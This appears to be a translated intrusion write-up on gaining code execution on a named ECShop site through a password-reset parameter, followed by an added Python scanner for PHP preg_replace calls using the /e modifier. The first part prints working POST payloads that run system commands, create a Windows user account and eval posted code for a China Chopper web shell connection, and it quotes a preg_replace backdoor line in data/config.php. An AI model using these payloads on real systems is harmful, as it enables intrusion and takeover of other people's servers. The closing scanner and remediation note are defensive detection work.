ECShop remote code execution vulnerability

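PHP code injection
 Target site: http://www.cunlide.com/
 ECShop version: appears to be 09
 An AWVS scan reported SQL injection, PHP code injection and several other vulnerabilities.
 First attempt with the exp: no result.
 The PHP code injection has to be submitted via POST, like this:
 SYSTEM privileges: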
  act=forget_pwd&action=get_pwd&email=${@print(system(net user))}&user_name=furybijj
 No result.
 
Reportedly, dropping system and using %60 (the URL-encoded backtick) instead:
 
 act=forget_pwd&action=get_pwd&email=$%7B@print(%60net user SUPPORT_388945a1 lifelongz%60)%7D&user_name=furybijj
 Success.
 
In fact, you can also connect directly with Chopper (菜刀).
 
Written as follows:
 
 <O>act=forget_pwd&action=get_pwd&email=${eval($_POST[test])}&user_name=furybijj</O>
 Alternatively:
  act=forget_pwd&action=get_pwd&email=%24%7b%40print%28%60net%20user%60%29%7d&user_name=furybijj
 
 act=forget_pwd&action=get_pwd&email=%24%7b%40eval%28%24_POST%5bfuck%5d%29%7d&user_name=furybijj
 Vulnerability cause
 
data/config.php
  define('EC_CHARSET','utf-8');
 @preg_replace("/[email]/e",$_POST['email'],"error");
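
An added example, not part of the original post: a small Python scanner that flags preg_replace calls using the /e modifier, the construct shown in data/config.php above, and rates a hit critical when the arguments reference request data. The function names and the sample PHP source are constructed for illustration, and the quoting in the sample is assumed.

```python
import re

# preg_replace( with a quoted regex literal as its first argument.
CALL = re.compile(
    r"preg_replace\s*\(\s*(?P<q>['\"])(?P<pat>.*?)(?<!\\)(?P=q)\s*,(?P<rest>[^;]*)",
    re.I | re.S)
SUPERGLOBAL = re.compile(r"\$_(POST|GET|REQUEST|COOKIE|SERVER|FILES)\b")
CLOSERS = {"(": ")", "[": "]", "{": "}", "<": ">"}  # bracket-style PCRE delimiters

def modifiers(pattern):
    """Return the modifier letters that follow the closing PCRE delimiter."""
    pattern = pattern.lstrip()
    if not pattern:
        return ""
    close = CLOSERS.get(pattern[0], pattern[0])
    end = pattern.rfind(close)
    return pattern[end + 1:] if end > 0 else ""

def scan_php(source, name="<memory>"):
    """Return (file, line, severity, snippet) for each preg_replace using /e."""
    findings = []
    for m in CALL.finditer(source):
        if "e" not in modifiers(m.group("pat")):
            continue  # an 'e' inside the pattern body is not the eval modifier
        tainted = SUPERGLOBAL.search(m.group("rest"))
        severity = "critical" if tainted else "review"
        line = source.count("\n", 0, m.start()) + 1
        findings.append((name, line, severity, m.group(0).strip()))
    return findings

# Constructed sample: line 3 mirrors the config.php line quoted above,
# line 4 is a harmless call, line 5 is a legacy /e use without request input.
SAMPLE = r'''<?php
define('EC_CHARSET','utf-8');
@preg_replace("/[email]/e",$_POST['email'],"error");
$t = preg_replace('/\s+/', ' ', $t);
$u = preg_replace('#<b>(.*?)</b>#ie', 'strtoupper("\\1")', $u);
'''

if __name__ == "__main__":
    for finding in scan_php(SAMPLE, "data/config.php"):
        print("%s:%d [%s] %s" % finding)
```

The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0. A hit rated critical in a configuration file means request data is being evaluated as PHP, and the line should be removed or rewritten with preg_replace_callback.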
